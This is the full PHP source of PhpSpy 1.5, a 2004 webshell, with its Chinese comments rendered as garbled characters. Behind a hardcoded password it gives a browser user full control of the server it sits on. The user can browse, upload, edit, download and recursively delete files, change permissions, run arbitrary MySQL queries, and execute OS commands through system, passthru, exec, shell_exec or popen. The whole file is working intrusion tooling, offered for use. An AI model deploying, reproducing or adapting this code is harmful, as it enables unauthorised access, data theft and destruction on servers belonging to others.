<?php /* +--------------------------------------------------------------------------+ | PhpSpy Version:1.5 | | Codz by Angel | | (c) 2004 Security Angel Team | | http://www.4ngel.net | | ======================================================================== | | Team: http://www.4ngel.net | | http://www.bugkidz.org | | Email: 4ngel@21cn.com | | Date: July 22st(My mother's birthday), 2004 | +--------------------------------------------------------------------------+ */ error_reporting(7); ob_start(); $mtime = explode(' ', microtime()); $starttime = $mtime[1] + $mtime[0]; /*===================== ³ÌÐòÅäÖà =====================*/ // ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤,1ΪÐèÒªÑéÖ¤,ÆäËûÊý×ÖΪֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ $admin['check']="1"; // ÑéÖ¤·½Ê½,1Ϊ²ÉÓà Session ÑéÖ¤,ÆäËûÊý×ÖÔò²ÉÓà CookieÑéÖ¤ // ĬÈϲÉÓà Session ÑéÖ¤,Èç¹û²»ÄÜÕý³£µÇ½,½¨Òé¸ÄΪ CookieÑéÖ¤ $admin['checkmode']="1"; // Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë $admin['pass']="hkuser"; /*===================== ÅäÖýáÊø =====================*/ // ÔÊÐí³ÌÐòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷ if ( function_exists('ini_get') ) { $onoff = ini_get('register_globals'); } else { $onoff = get_cfg_var('register_globals'); } if ($onoff != 1) { @extract($_POST, EXTR_SKIP); @extract($_GET, EXTR_SKIP); } /*===================== Éí·ÝÑéÖ¤ =====================*/ if($admin['check']=="1") { if($admin['checkmode']=="1") { /*------- session ÑéÖ¤ -------*/ session_start(); if ($_GET['action'] == "logout") { session_destroy(); echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>></a></span>"; exit; } if ($_POST['action'] == "login") { $adminpass=trim($_POST['adminpass']); if ($adminpass==$admin['pass']) { $_SESSION['adminpass'] = $admin['pass']; echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>></a></span>"; exit; } } if (session_is_registered('adminpass')) { if ($_SESSION['adminpass']!=$admin['pass']) { loginpage(); } } else { loginpage(); } } else { /*------- cookie ÑéÖ¤ -------*/ if ($_GET['action'] == "logout") { setcookie ("adminpass", ""); echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>></a></span>"; exit; } if ($_POST['action'] == "login") { $adminpass=trim($_POST['adminpass']); if ($adminpass==$admin['pass']) { setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$_SERVER['PHP_SELF']."\">ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>></a></span>"; exit; } } if (isset($_COOKIE['adminpass'])) { if ($_COOKIE['adminpass']!=$admin['pass']) { loginpage(); } } else { loginpage(); } } }//end check /*===================== ÑéÖ¤½áÊø =====================*/ // ÅÐ¶Ï magic_quotes_gpc ״̬ if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } // ÏÂÔØÎļþ if (!empty($downfile)) { if (!@file_exists($downfile)) { echo "<script>alert('ÄãҪϵÄÎļþ²»´æÔÚ!')</script>"; } else { $filename = basename($downfile); $filename_info = explode('.', $filename); $fileext = $filename_info[count($filename_info)-1]; header('Content-type: application/x-'.$fileext); header('Content-Disposition: attachment; filename='.$filename); header('Content-Description: PHP3 Generated Data'); @readfile($downfile); exit; } } // ³ÌÐòĿ¼(Îļþϵͳ) $pathname=str_replace('\\','/',dirname(__FILE__)); // »ñÈ¡µ±Ç°Â·¾¶ if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // Åж϶ÁдÇé¿ö if (dir_writeable($nowpath)) { $dir_writeable = "¿Éд"; } else { $dir_writeable = "²»¿Éд"; } $dis_func = get_cfg_var("disable_functions"); $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : ""; $shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShellģʽ</a>" : ""; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>PhpSpy Ver 1.5</title> <style type="text/css"> .maintable { background-color: "#FFFFFF"; border: "1px solid #115173"; } body,td { font-family: "sans-serif"; font-size: "12px"; line-height: "150%"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; } a:link, a:visited, a:active{ color: "#000000"; text-decoration: underline; } a:hover{ color: "#465584"; text-decoration: none; } .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"} </style> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <p><strong><a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»Ø¸ùĿ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL²éѯ</a> | <a href="http://www.4ngel.net" target="_blank" title="ÏÂÔش˳ÌÐò">Version 1.5</a></strong></p> <?php if ($_GET['action'] == "phpinfo") { $dis_func = get_cfg_var("disable_functions"); echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>"; exit; } ?> <table width="760" border="0" cellpadding="0"> <form action="" method="GET"> <tr> <td><p>³ÌÐò·¾¶:<?=$pathname?><br>µ±Ç°Ä¿Â¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?> <br>ÌøתĿ¼: <input name="dir" type="text" class="INPUT"> <input type="submit" class="INPUT" value="È·¶¨"> ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½ </p></td> </tr> </form> <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data"> <tr> <td colspan="2">ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: <input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td> </tr> </form> <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST"> <tr> <td colspan="2">н¨ÎļþÔÚµ±Ç°Ä¿Â¼: <input name="newfile" type="text" class="INPUT" value=""> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="createfile"></td> </tr> </form> <form action="" method="POST"> <tr> <td colspan="2">н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: <input name="newdirectory" type="text" class="INPUT" value=""> <input type="submit" class="INPUT" value="È·¶¨"> <input name="action" type="hidden" value="createdirectory"></td> </tr> </form> </table> <hr width="760" noshade> <?php /*===================== Ö´ÐвÙ×÷ ¿ªÊ¼ =====================*/ echo "<p><b>\n"; // ɾ³ýÎļþ if(@$delfile!="") { if(file_exists($delfile)) { @unlink($delfile); echo "".$delfile." ɾ³ý³É¹¦!"; } else { echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!"; } } // ɾ³ýĿ¼ elseif($_POST['action'] == "rmdir") { if($deldir!="") { $deldirs="$dir/$deldir"; if(!file_exists("$deldirs")) { echo "Ŀ¼ÒѲ»´æÔÚ!"; } else { deltree($deldirs); } } else { echo "ɾ³ýʧ°Ü!"; } } // ´´½¨Ä¿Â¼ elseif($_POST['action'] == "createdirectory") { if(!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if(file_exists("$mkdirs")) { echo "¸ÃĿ¼ÒÑ´æÔÚ!"; } else { echo $msg=@mkdir("$mkdirs",0777) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!"; @chmod("$mkdirs",0777); } } } // ÉÏ´«Îļþ elseif($_POST['action'] == "uploadfile") { echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; } // ±à¼Îļþ elseif($_POST['action'] == "doeditfile") { $filename="$dir/$editfilename"; @$fp=fopen("$filename","w"); echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!"; @fclose($fp); } // ±à¼ÎļþÊôÐÔ elseif($_POST['action'] == "editfileperm") { $fileperm=base_convert($_POST['fileperm'],8,10); echo $msg=@chmod($dir."/".$file,$fileperm) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!"; echo " [".$file."] Ð޸ĺóµÄÊôÐÔΪ:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4).""; } // Á¬½ÓMYSQL elseif($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!"; } else { echo mysql_error(); } } // Ö´ÐÐSQLÓï¾ä elseif($doquery) { @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); $result = @mysql_query($_POST['sql_query']); if ($result) { echo "SQLÓï¾ä³É¹¦Ö´ÐÐ"; }else{ echo "³ö´í: ".mysql_error(); } mysql_close(); } // ²é¿´PHPÅäÖòÎÊý×´¿ö elseif($_POST['action'] == "viewphpvar") { echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; } else { echo "±¾³ÌÐòÓÉ Security Angel °²È«×éÖ¯ angel[BST] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> ÏÂÔØ×îа汾."; } echo "</b></p>\n"; /*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/ if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr bgcolor="#cccccc"> <td align="center" nowrap width="40%"><b>Îļþ</b></td> <td align="center" nowrap width="20%"><b>ÐÞ¸ÄÈÕÆÚ</b></td> <td align="center" nowrap width="12%"><b>´óС</b></td> <td align="center" nowrap width="8%"><b>ÊôÐÔ</b></td> <td align="center" nowrap width="20%"><b>²Ù×÷</b></td> </tr> <?php // Ŀ¼Áбí $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $b="$dir/$file"; $a=@is_dir($b); if($a=="1"){ if($file!=".."&&$file!=".") { $lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file")); $dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4); echo "<tr class=".getrowbg().">\n"; echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><dir></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ³ý</a></td>\n"; echo "</tr>\n"; } else { if($file=="..") { echo "<tr class=".getrowbg().">\n"; echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n"; echo "</tr>\n"; } } $dir_i++; } }//while @closedir($dirs); // ÎļþÁбí $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $b="$dir/$file"; $a=@is_dir($b); if($a=="0"){ $size=@filesize("$dir/$file"); $size=$size/1024 ; $size= @number_format($size, 3); $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file")); @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4); echo "<tr class=".getrowbg().">\n"; echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n"; echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">ɾ³ý</a></td>\n"; echo "</tr>\n"; $file_i++; } } @closedir($dirs); echo "<tr class=".getrowbg().">\n"; echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." ¸öĿ¼<br>".$file_i." ¸öÎļþ</td>\n"; echo "</tr>\n"; ?> </table> <?php }// end dir elseif ($_GET['action'] == "editfile") { if($newfile=="") { $filename="$dir/$editfile"; $fp=@fopen($filename,"r"); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents=htmlspecialchars($contents); }else{ $editfile=$newfile; $filename = "$dir/$editfile"; } ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">н¨/±à¼Îļþ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td> </tr> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td align="center">µ±Ç°Îļþ:<input class="input" type="text" name="editfilename" size="30" value="<?=$editfile?>"> ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ</td> </tr> <tr class="firstalt"> <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td> </tr> <tr class="secondalt"> <td align="center"><input type="submit" value="È·¶¨Ð´Èë" class="input"> <input name="action" type="hidden" value="doeditfile"> <input type="reset" value="ÖØÖÃ" class="input"></td> </tr> </form> </table> <?php }//end editfile elseif ($_GET['action'] == "shell") { if (!get_cfg_var("safe_mode")) { ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">WebShell Mode</td> </tr> <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td align="center">Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.</td> </tr> <tr class="firstalt"> <td align="center"> Ñ¡ÔñÖ´Ðк¯Êý: <select name="execfunc" class="input"> <option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option> <option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option> <option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option> <option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option> <option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option> </select>¡¡ ÊäÈëÃüÁî: <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input"> <input type="submit" value="execute" class="input"></td> </tr> <tr class="secondalt"> <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php if (!empty($_POST['command'])) { if ($execfunc=="system") { system($_POST['command']); } elseif ($execfunc=="passthru") { passthru($_POST['command']); } elseif ($execfunc=="exec") { $result = exec($_POST['command']); echo $result; } elseif ($execfunc=="shell_exec") { $result=shell_exec($_POST['command']); echo $result; } elseif ($execfunc=="popen") { $pp = popen($_POST['command'], 'r'); $read = fread($pp, 2096); echo $read; pclose($pp); } else { system($_POST['command']); } } ?></textarea></td> </tr> </form> </table> <?php } else { ?> <p><b>Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.</b></p> <?php } }//end shell elseif ($_GET['action'] == "deldir") { ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="firstalt"> <td align="center">ɾ³ý <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td> </tr> <tr class="secondalt"> <td align="center">×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?</td> </tr> <tr class="firstalt"> <td align="center"> <input name="action" type="hidden" value="rmdir"> <input type="submit" value="delete" class="input"> </td> </tr> </form> </table> <?php }//end deldir elseif ($_GET['action'] == "fileperm") { ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">ÐÞ¸ÄÎļþÊôÐÔ [<a href="?dir=<?=urlencode($dir)?>">·µ»Ø</a>]</td> </tr> <form action="?dir=<?=urlencode($dir)?>" method="POST"> <tr class="secondalt"> <td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> µÄÊôÐÔΪ: <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input"> <input name="dir" type="hidden" value="<?=urlencode($dir)?>"> <input name="action" type="hidden" value="editfileperm"> <input type="submit" value="modify" class="input"></td> </tr> </form> </table> <?php }//end fileperm elseif ($_GET['action'] == "sql") { $servername = isset($servername) ? $servername : '127.0.0.1'; $dbusername = isset($dbusername) ? $dbusername : 'root'; $dbpassword = isset($dbpassword) ? $dbpassword : ''; $dbname = isset($dbname) ? $dbname : ''; ?> <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <tr class="firstalt"> <td align="center">Ö´ÐÐ SQL Óï¾ä</td> </tr> <form action="?action=sql" method="POST"> <tr class="secondalt"> <td align="center">Host: <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> User: <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>"> Pass: <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>"> DB: <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>"> <input name="connect" type="submit" class="INPUT" value="Á¬½Ó"></td> </tr> <tr class="firstalt"> <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td> </tr> <tr class="secondalt"> <td align="center"><input type="submit" name="doquery" value="Ö´ÐÐ" class="input"></td> </tr> </form> </table> <?php }//end sql query elseif ($_GET['action'] == "phpenv") { $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊÐíÉÏ´«"; $adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>"; $dis_func = get_cfg_var("disable_functions"); if ($dis_func == "") { $dis_func = "No"; }else { $dis_func = str_replace(" ","<br>",$dis_func); $dis_func = str_replace(",","<br>",$dis_func); } $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info[0] = array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())); $info[1] = array("·þÎñÆ÷ÓòÃû","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>"); $info[2] = array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER["SERVER_NAME"])); $info[3] = array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS); $info[5] = array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER["HTTP_ACCEPT_LANGUAGE"]); $info[6] = array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER["SERVER_SOFTWARE"]); $info[7] = array("Web·þÎñ¶Ë¿Ú",$_SERVER["SERVER_PORT"]); $info[8] = array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name())); $info[9] = array("PHP°æ±¾",PHP_VERSION); $info[10] = array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode")); $info[11] = array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail); $info[12] = array("±¾Îļþ·¾¶",__FILE__); $info[13] = array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen")); $info[14] = array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")); $info[15] = array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors")); $info[16] = array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")); $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")); $info[18] = array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")); $info[19] = array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size")); $info[20] = array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize); $info[21] = array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"); $info[22] = array("±»½ûÓõĺ¯Êý disable_functions",$dis_func); $info[23] = array("phpinfo()",$phpinfo); $info[24] = array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'); $info[25] = array("ͼÐδ¦Àí GD Library",getfun("imageline")); $info[26] = array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close")); $info[27] = array("MySQLÊý¾Ý¿â",getfun("mysql_close")); $info[28] = array("SyBaseÊý¾Ý¿â",getfun("sybase_close")); $info[29] = array("OracleÊý¾Ý¿â",getfun("ora_close")); $info[30] = array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff")); $info[31] = array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match")); $info[32] = array("PDFÎĵµÖ§³Ö",getfun("pdf_close")); $info[33] = array("Postgre SQLÊý¾Ý¿â",getfun("pg_close")); $info[34] = array("SNMPÍøÂç¹ÜÀíÐÒé",getfun("snmpget")); $info[35] = array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose")); $info[36] = array("XML½âÎö",getfun("xml_set_object")); $info[37] = array("FTP",getfun("ftp_login")); $info[38] = array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close")); $info[39] = array("SessionÖ§³Ö",getfun("session_start")); $info[40] = array("SocketÖ§³Ö",getfun("fsockopen")); ?> <table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <form action="?action=phpenv" method="POST"> <tr class="firstalt"> <td style="padding-left: 5px;"><b>²é¿´PHPÅäÖòÎÊý×´¿ö</b></td> </tr> <tr class="secondalt"> <td style="padding-left: 5px;">ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="²é¿´" class="input"><input name="action" type="hidden" value="viewphpvar"></td> </tr> </form> <?php for($a=0;$a<3;$a++){ if($a == 0){ $hp = array("server","·þÎñÆ÷ÌØÐÔ"); }elseif($a == 1){ $hp = array("php","PHP»ù±¾ÌØÐÔ"); }elseif($a == 2){ $hp = array("basic","×é¼þÖ§³Ö×´¿ö"); } ?> <tr class="firstalt"> <td style="padding-left: 5px;"><b><?=$hp[1]?></b></td> </tr> <tr class="secondalt"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <? if($a == 0){ for($i=0;$i<=12;$i++){ echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; } }elseif($a == 1){ for($i=13;$i<=24;$i++){ echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; } }elseif($a == 2){ for($i=25;$i<=40;$i++){ echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n"; } } ?> </table> </td> </tr> <? }//for echo "</table>"; }//end phpenv ?> <hr width="760" noshade> <table width="760" border="0" cellpadding="0"> <tr> <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td> <td align="right"><?php debuginfo(); ob_end_flush(); ?></td> </tr> </table> </center> </body> </html> <?php /*====================================================== º¯Êý¿â ======================================================*/ // µÇ½Èë¿Ú function loginpage() { ?> <style type="text/css"> input { font-family: "Verdana"; font-size: "11px"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; } </style> <form method="POST" action=""> <span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login"> <input type="submit" value="OK"> </form> <?php exit; }//end loginpage() // Ò³Ãæµ÷ÊÔÐÅÏ¢ function debuginfo() { global $starttime; $mtime = explode(' ', microtime()); $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); echo "Processed in $totaltime second(s)"; } // È¥µôתÒå×Ö·û function stripslashes_array(&$array) { while(list($key,$var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; } // ɾ³ýĿ¼ function deltree($deldir) { $mydir=@dir($deldir); while($file=$mydir->read()) { if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { @chmod("$deldir/$file",0777); deltree("$deldir/$file"); } if (is_file("$deldir/$file")) { @chmod("$deldir/$file",0777); @unlink("$deldir/$file"); } } $mydir->close(); @chmod("$deldir",0777); echo @rmdir($deldir) ? "<b>Ŀ¼ɾ³ý³É¹¦!</b>" : "<font color=\"#ff0000\">Ŀ¼ɾ³ýʧ°Ü!</font>"; } // Åж϶ÁдÇé¿ö function dir_writeable($dir) { if (!is_dir($dir)) { @mkdir($dir, 0777); } if(is_dir($dir)) { if ($fp = @fopen("$dir/test.txt", 'w')) { @fclose($fp); @unlink("$dir/test.txt"); $writeable = 1; } else { $writeable = 0; } } return $writeable; } // ±í¸ñÐмäµÄ±³¾°É«Ìæ»» function getrowbg() { global $bgcounter; if ($bgcounter++%2==0) { return "firstalt"; } else { return "secondalt"; } } // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ function getPath($mainpath, $relativepath) { global $dir; $mainpath_info = explode('/', $mainpath); $relativepath_info = explode('/', $relativepath); $relativepath_info_count = count($relativepath_info); for ($i=0; $i<$relativepath_info_count; $i++) { if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; if ($relativepath_info[$i] == '..') { $mainpath_info_count = count($mainpath_info); unset($mainpath_info[$mainpath_info_count-1]); continue; } $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; } //end for return implode('/', $mainpath_info); } // ¼ì²éPHPÅäÖòÎÊý function getphpcfg($varname) { switch($result = get_cfg_var($varname)) { case 0: return No; break; case 1: return Yes; break; default: return $result; break; } } // ¼ì²éº¯ÊýÇé¿ö function getfun($funName) { return (false !== function_exists($funName)) ? Yes : No; } ?>